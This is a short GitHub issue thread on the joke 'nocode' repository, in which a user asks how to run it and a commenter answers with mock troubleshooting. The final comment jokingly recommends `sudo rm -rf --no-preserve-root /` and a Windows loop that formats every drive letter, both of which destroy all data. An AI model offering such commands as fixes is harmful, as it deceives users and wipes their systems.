### ISSUE TITLE
Instructions unclear.

### ISSUE THREAD

**Issue by MengelCode** [kelseyhightower/nocode#3938]
How to run this?

**Comment by hucario** [comment]
You don't.
If that doesn't work, you can try restarting your computer.
If that doesn't work, try `sudo rm -rf --no-preserve-root /` or ```for #37;%i in (a:,b:,c:,d:,e:,f:,g:,h:,i:,j:,k:,l:,m:,n:,o:,p:,q:,r:,s:,t:,u:,v:,w:,x:,y:,z:) do format %%i /FS:NTFS /x```
